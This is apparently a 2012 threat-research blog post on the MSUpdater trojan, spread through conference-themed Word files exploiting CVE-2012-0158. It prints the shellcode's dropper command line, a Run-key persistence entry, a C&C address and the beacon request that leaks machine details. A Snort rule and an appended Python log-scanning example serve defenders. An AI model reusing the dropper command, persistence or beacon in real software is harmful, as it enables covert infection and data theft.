MSUpdater Trojan found using CVE-2012-0158: Space and Missile Defense Conference

April 23, 2012  |  Jaime Blasco

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns across a range of industries. One of the campaigns that attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims still have low antivirus detection. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

So the victim is shown the following document:

The binary created by the shellcode is a dropper that contains the actual malware embedded in a resource. After deciphering the content, it creates the new binary under Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry key in order to maintain persistence:

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd SZ “C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\GoogleUpdate.exe”

The payload is detected as BKDR_FYNLOS.SM1 and has been used in other similar attacks in the past. The malware connects to the C&C server with address 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)

Host: 204.13.66.119

Connection: Keep-Alive

The values sent are the operating system version (h1=51, i.e. 5.1 = Windows XP), the encoded serial number of the machine and the encoded machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago. Once again the group behind these attacks is using conference-related subjects as a lure to target these industries.

You can use the following Snort rule, already available from Emerging Threats, to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1"; flow:from_client,established; content:"/search"; http_uri; content:"?h1="; fast_pattern; http_uri; content:"&h2="; distance:0; http_uri; content:"&h3="; distance:0; http_uri; content:"User-Agent|3a| Mozilla/5.0 (compatible|3B|"; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)
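The same three conditions the Snort rule checks (a /search URI carrying h1=, h2= and h3= in order, plus a User-Agent starting with "Mozilla/5.0 (compatible;") can also be applied retrospectively to proxy logs. The following Python is an added example, not code from the original post or from Emerging Threats; the log line format and the sample lines are constructed assumptions, and the beacon line reproduces the request shown above.

```python
import re
from typing import Optional

# Constructed proxy log lines (assumed format: time src method url "user-agent").
# Line 1 mirrors the captured beacon; lines 2 and 3 are benign look-alikes.
SAMPLE_LOG = """\
2012-04-20T10:01:12Z 10.0.0.5 GET http://204.13.66.119/search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA "Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)"
2012-04-20T10:01:13Z 10.0.0.7 GET http://www.example.com/search?q=h1+tags "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
2012-04-20T10:01:14Z 10.0.0.9 GET http://www.example.org/search?h1=1&h2=2 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
"""

LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
# URI shape from the Snort rule: /search..., then h1=, h2=, h3= in that order.
# The optional h4 capture is an extension based on the single captured request.
URI_RE = re.compile(r"/search\d*\?h1=(\d+)&h2=\d+&h3=[^&\s]+(?:&h4=([A-Z]+))?")
UA_PREFIX = "Mozilla/5.0 (compatible;"   # what the rule's http_header content matches


def os_version(h1: str) -> str:
    """h1 carries the Windows version with the dot removed: 51 -> 5.1 (XP)."""
    return f"{h1[0]}.{h1[1:]}" if len(h1) >= 2 else h1


def classify(line: str) -> Optional[dict]:
    """Return beacon details if the line matches the MSUpdater C&C pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, src, _method, url, ua = m.groups()
    host, _, path = url.partition("://")[2].partition("/")   # strip scheme and host
    um = URI_RE.search("/" + path)
    # Both the URI shape and the User-Agent prefix must match, as in the rule;
    # line 3 above has the UA prefix but lacks h3=, so it is not flagged.
    if not (um and ua.startswith(UA_PREFIX)):
        return None
    return {"time": ts, "src": src, "dst": host,
            "os": os_version(um.group(1)), "h4": um.group(2)}


def scan(log: str) -> list:
    """Run classify() over every line of a log and collect the hits."""
    return [hit for hit in (classify(l) for l in log.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The h4 value is surfaced raw because the post does not document its encoding; it is still useful as a per-host pivot when correlating beacons.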
